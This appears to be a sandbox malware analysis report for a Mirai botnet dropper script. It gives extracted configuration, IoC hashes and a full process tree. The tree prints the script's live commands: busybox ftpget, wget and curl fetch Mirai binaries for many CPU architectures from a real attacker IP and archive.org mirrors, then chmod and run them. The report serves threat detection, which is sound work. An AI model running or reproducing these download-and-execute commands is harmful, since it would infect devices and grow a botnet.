mirai | 1a8b53d206810f02a59c8a0ce14bd3ff49a31f78802ef24e0a3e63fd4e857b2d

Analysis

max time kernel
101s
max time network
118s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
09-08-2024 10:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

f064b93641da57ab1b510a06a284bacd
SHA1

77ebf690333960186de349f1ccd1d6ac9df3748a
SHA256

1a8b53d206810f02a59c8a0ce14bd3ff49a31f78802ef24e0a3e63fd4e857b2d
SHA512

02e4910ae45ca7e75053ede74511bcf417a72a1d15fb60c2e44bae30320b0e89dd98d383aefec312b23dca671892d0e1d6991fb45c5d5af0bcf21d84388c0e54
SSDEEP

48:pccGoQSoGFIAw6YQFaak0xrr6TofZKYn6ra/oSY9QJgnmlt6YLupG:+cGoQSoGFhw6ZFaakwrhcsd/+wa4t

Score

10^/10

mirai mirai botnet

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
154.216.19.139
Port:
21
Username:
anonymous
Password:
busybox@

Extracted

Family

mirai

Botnet

MIRAI

Extracted

Family

mirai

Botnet

MIRAI

secure.microsoftconnect.net

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai

Executes dropped EXE 16 IoCs

ioc	pid	Process
/tmp/azvFgdBZ/dvrHelper	746	dvrHelper
/tmp/azvFgdBZ/dvrHelper	779	dvrHelper
/tmp/azvFgdBZ/dvrHelper	796	dvrHelper
/tmp/azvFgdBZ/dvrHelper	800	dvrHelper
/tmp/azvFgdBZ/dvrHelper	804	dvrHelper
/tmp/azvFgdBZ/dvrHelper	822	dvrHelper
/tmp/azvFgdBZ/dvrHelper	842	dvrHelper
/tmp/azvFgdBZ/dvrHelper	846	dvrHelper
/tmp/azvFgdBZ/dvrHelper	851	dvrHelper
/tmp/azvFgdBZ/dvrHelper	858	dvrHelper
/tmp/azvFgdBZ/dvrHelper	862	dvrHelper
/tmp/azvFgdBZ/dvrHelper	866	dvrHelper
/tmp/azvFgdBZ/dvrHelper	870	dvrHelper
/tmp/azvFgdBZ/dvrHelper	874	dvrHelper
/tmp/azvFgdBZ/dvrHelper	878	dvrHelper
/tmp/dvrHelper	883	dvrHelper

Reads runtime system information 17 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 32 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/starter	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:709
- /bin/rm
  rm starter
  2⤵
  PID:711
- /bin/busybox
  busybox ftpget 154.216.19.139 starter /bins/starter.sh
  2⤵
  - Writes file to tmp directory
  PID:712
- /bin/sh
  sh ./starter
  2⤵
  PID:739
- - /bin/mkdir
    mkdir /tmp/azvFgdBZ
    3⤵
    - Reads runtime system information
    PID:740
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.bin
    3⤵
    - Writes file to tmp directory
    PID:741
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:744
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:746
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv4l
    3⤵
    - Writes file to tmp directory
    PID:748
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:777
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:779
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv5l
    3⤵
    - Writes file to tmp directory
    PID:781
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:795
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:796
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv6l
    3⤵
    - Writes file to tmp directory
    PID:798
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:799
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:800
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv7l
    3⤵
    - Writes file to tmp directory
    PID:802
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:803
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:804
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i586
    3⤵
    - Writes file to tmp directory
    PID:806
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:821
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:822
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i686
    3⤵
    - Writes file to tmp directory
    PID:824
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:841
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:842
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.m68k
    3⤵
    - Writes file to tmp directory
    PID:844
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:845
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:846
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mips
    3⤵
    PID:848
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mipsel
    3⤵
    - Writes file to tmp directory
    PID:849
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:850
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:851
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.powerpc
    3⤵
    - Writes file to tmp directory
    PID:853
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:857
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:858
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sh4
    3⤵
    - Writes file to tmp directory
    PID:860
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:861
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:862
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sparc
    3⤵
    - Writes file to tmp directory
    PID:864
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:865
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:866
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.x86_64
    3⤵
    - Writes file to tmp directory
    PID:868
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:869
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:870
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.gnueabihf
    3⤵
    - Writes file to tmp directory
    PID:872
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:873
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:874
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.arc
    3⤵
    - Writes file to tmp directory
    PID:876
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:877
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:878
- /bin/rm
  rm dvrHelper
  2⤵
  PID:880
- /usr/bin/wget
  wget http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:881
- /bin/chmod
  chmod 0755 ./dvrHelper
  2⤵
  PID:882
- /tmp/dvrHelper
  ./dvrHelper
  2⤵
  - Executes dropped EXE
  PID:883
- /bin/rm
  rm dvrHelper
  2⤵
  PID:885
- /usr/bin/wget
  wget http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:886
- /bin/rm
  rm dvrHelper
  2⤵
  PID:887
- /usr/bin/wget
  wget http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:888
- /bin/rm
  rm dvrHelper
  2⤵
  PID:889
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:890
- /bin/rm
  rm dvrHelper
  2⤵
  PID:891
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:892
- /bin/rm
  rm dvrHelper
  2⤵
  PID:893
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:894
- /bin/rm
  rm dvrHelper
  2⤵
  PID:895
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:896
- /bin/rm
  rm dvrHelper
  2⤵
  PID:897
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:898
- /bin/rm
  rm dvrHelper
  2⤵
  PID:899
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:900
- /bin/rm
  rm dvrHelper
  2⤵
  PID:901
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:902
- /bin/rm
  rm dvrHelper
  2⤵
  PID:903
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:904
- /bin/rm
  rm dvrHelper
  2⤵
  PID:905
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:906
- /bin/rm
  rm dvrHelper
  2⤵
  PID:907
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:908
- /bin/rm
  rm dvrHelper
  2⤵
  PID:909
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:910
- /bin/rm
  rm dvrHelper
  2⤵
  PID:911
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:912
- /bin/rm
  rm dvrHelper
  2⤵
  PID:913
- /usr/bin/wget
  wget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:914
- /bin/rm
  rm dvrHelper
  2⤵
  PID:915
- /usr/bin/curl
  curl http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:916
- /bin/rm
  rm dvrHelper
  2⤵
  PID:918
- /usr/bin/curl
  curl http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:919
- /bin/rm
  rm dvrHelper
  2⤵
  PID:921
- /usr/bin/curl
  curl http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:922
- /bin/rm
  rm dvrHelper
  2⤵
  PID:924
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:925
- /bin/rm
  rm dvrHelper
  2⤵
  PID:927
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:928
- /bin/rm
  rm dvrHelper
  2⤵
  PID:930
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:931
- /bin/rm
  rm dvrHelper
  2⤵
  PID:933
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:934
- /bin/rm
  rm dvrHelper
  2⤵
  PID:936
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:937
- /bin/rm
  rm dvrHelper
  2⤵
  PID:939
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:940
- /bin/rm
  rm dvrHelper
  2⤵
  PID:942
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:943
- /bin/rm
  rm dvrHelper
  2⤵
  PID:945
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:946
- /bin/rm
  rm dvrHelper
  2⤵
  PID:948
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:949
- /bin/rm
  rm dvrHelper
  2⤵
  PID:951
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:952
- /bin/rm
  rm dvrHelper
  2⤵
  PID:954
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:955
- /bin/rm
  rm dvrHelper
  2⤵
  PID:957
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:958
- /bin/rm
  rm dvrHelper
  2⤵
  PID:960
- /usr/bin/curl
  curl http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:961
- /bin/rm
  rm dvrHelper
  2⤵
  PID:963
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -O dvrHelper
  2⤵
  PID:964
- /bin/rm
  rm dvrHelper
  2⤵
  PID:965
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -O dvrHelper
  2⤵
  PID:966
- /bin/rm
  rm dvrHelper
  2⤵
  PID:967
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -O dvrHelper
  2⤵
  PID:968
- /bin/rm
  rm dvrHelper
  2⤵
  PID:969
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -O dvrHelper
  2⤵
  PID:970
- /bin/rm
  rm dvrHelper
  2⤵
  PID:971
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -O dvrHelper
  2⤵
  PID:972
- /bin/rm
  rm dvrHelper
  2⤵
  PID:973
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -O dvrHelper
  2⤵
  PID:974
- /bin/rm
  rm dvrHelper
  2⤵
  PID:975
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -O dvrHelper
  2⤵
  PID:976
- /bin/rm
  rm dvrHelper
  2⤵
  PID:977
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -O dvrHelper
  2⤵
  PID:978
- /bin/rm
  rm dvrHelper
  2⤵
  PID:979
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -O dvrHelper
  2⤵
  PID:980
- /bin/rm
  rm dvrHelper
  2⤵
  PID:981
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -O dvrHelper
  2⤵
  PID:982
- /bin/rm
  rm dvrHelper
  2⤵
  PID:983
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -O dvrHelper
  2⤵
  PID:984
- /bin/rm
  rm dvrHelper
  2⤵
  PID:985
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -O dvrHelper
  2⤵
  PID:986
- /bin/rm
  rm dvrHelper
  2⤵
  PID:987
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -O dvrHelper
  2⤵
  PID:988
- /bin/rm
  rm dvrHelper
  2⤵
  PID:989
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -O dvrHelper
  2⤵
  PID:990
- /bin/rm
  rm dvrHelper
  2⤵
  PID:991
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper
  2⤵
  PID:992
- /bin/rm
  rm dvrHelper
  2⤵
  PID:993
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper
  2⤵
  PID:994
- /bin/rm
  rm dvrHelper
  2⤵
  PID:995
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -o dvrHelper
  2⤵
  PID:996
- /bin/rm
  rm dvrHelper
  2⤵
  PID:997
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -o dvrHelper
  2⤵
  PID:998
- /bin/rm
  rm dvrHelper
  2⤵
  PID:999
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -o dvrHelper
  2⤵
  PID:1000
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1001
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -o dvrHelper
  2⤵
  PID:1002
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1003
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -o dvrHelper
  2⤵
  PID:1004
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1005
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -o dvrHelper
  2⤵
  PID:1006
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1007
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -o dvrHelper
  2⤵
  PID:1008
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1009
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -o dvrHelper
  2⤵
  PID:1010
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1011
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -o dvrHelper
  2⤵
  PID:1012
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1013
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -o dvrHelper
  2⤵
  PID:1014
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1015
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -o dvrHelper
  2⤵
  PID:1016
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1017
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -o dvrHelper
  2⤵
  PID:1018
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1019
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -o dvrHelper
  2⤵
  PID:1020
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1021
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -o dvrHelper
  2⤵
  PID:1022
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1023
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper
  2⤵
  PID:1024
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1025
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper
  2⤵
  PID:1026

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/azvFgdBZ/dvrHelper

Filesize
914KB

MD5
6a98f1f740434bb0d3da9a431bb7fefd

SHA1
4d7242cbfa380596d0292c9c9be847862cdb24f1

SHA256
ad3c19afec823def5b53f480eb919b75129dc820dbead758ecc5097d3ddbacef

SHA512
5b76a071270d7c213639bb111903f8c74445a7b5e8af88aab04957c6586332dce7c866a3031ea78544fcffbc3e39b6c90d712d6ab06bbf97a0418d9290de7558

Download Submit
/tmp/azvFgdBZ/dvrHelper

Filesize
59KB

MD5
b480aeaa8aea4c14f64a18c173446b7e

SHA1
f32fc9d6287db05d9a48a948f4aa2ba04e4b73a4

SHA256
0ab267b78d6c6d1faada747adba0da9f57ce3a7dc1b9a4e968f313dc41d6add1

SHA512
589f02b57d842c5f348c3f50f32a2e8c45ee30d25f61524a58f590780a3558578b4780bb93a69a2419aab7bcf47a929801c77c6e63b8ade436fcc31bb546f4ba

Download Submit
/tmp/azvFgdBZ/dvrHelper

Filesize
52KB

MD5
239a2559915a73284cc52944dd9c9643

SHA1
8c19ed6b2f40232bd38ec7013ced9b8c9ffa7a3f

SHA256
c8f07011c9d3cd46cdc9d1bc9cef48a36c14defb0f94dd1d3a67e085a6fac55a

SHA512
0eb5b42f41718019a78111e9367e65668c3bcda0f1d469c7ea15fdbef517135ca616cf1bb780f38a835bbed4c932be43d0a9d9152508e866116f6e534c833eec

Download Submit
/tmp/azvFgdBZ/dvrHelper

Filesize
69KB

MD5
55d936e9afa4b869c8f6fe345c217f1e

SHA1
ffdfbc85c3452cd781a0df555f2a7bad07d86fce

SHA256
b1229bb669f3c7578cbc77e41dec812ec366394bcb344c7c65a5e8fab5fc5164

SHA512
e3e7d62dc810c66ac5c973a4eb6931c251715f065c95d4f5397405c3e32463f5d3732d41f1187c904765c09e6936a0ff8ca0ae2e6f7aa55d0e103d0dde4acdf6

Download Submit
/tmp/azvFgdBZ/dvrHelper

Filesize
87KB

MD5
47d8efca2764e49c87e24ec8701a426e

SHA1
b3a085cd33cbc24931d9f03bcc13e6e41bb8f44f

SHA256
59560da4441b5e239b5d330890fd163bebc42f3fc6b4b113d8332935b6da0a87

SHA512
4fe12e641522a19f0d25e0380c1f99cca1694257b6e4e038adb561ac78cc20e1c2ca772237282ac24c0bfceac4a9797e96c040b6aea5dfbfea655919c8ff02e8

Download Submit
/tmp/azvFgdBZ/dvrHelper

Filesize
360KB

MD5
7a81da52d99ff2fe3feacccab9ca5076

SHA1
941ad2b09c6f1de8f9ece786dded59279a51adcc

SHA256
575e7ba6c123a339ef5989852abfbaea24af6df81f4321ea80e8a5d3fd60482f

SHA512
e7146e94216296bc5d0929f9d41688f461fa631f81078040514917f4c397026ee2feba6f04e8fd4a42859a79a85c6c2a9f34404179ae5beeff769700c4cf0295

Download Submit
/tmp/starter

Filesize
1KB

MD5
7f2ff2a38336a889de920d227574d543

SHA1
58d61a19d9785a51d379547cfbd8326e7474535d

SHA256
f2232fae5a51d77cd7d00264806f08b0435f320b2d81530d7a87fe2fa13982f8

SHA512
ca8d1b911f664f69593da1b5b8a43ea00d324ca74df870eb1bac356eb240492af5e1a5aed8d1fda1c1266adfb577c05788ccfdd6ba387e132e84ad75eefc9feb

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads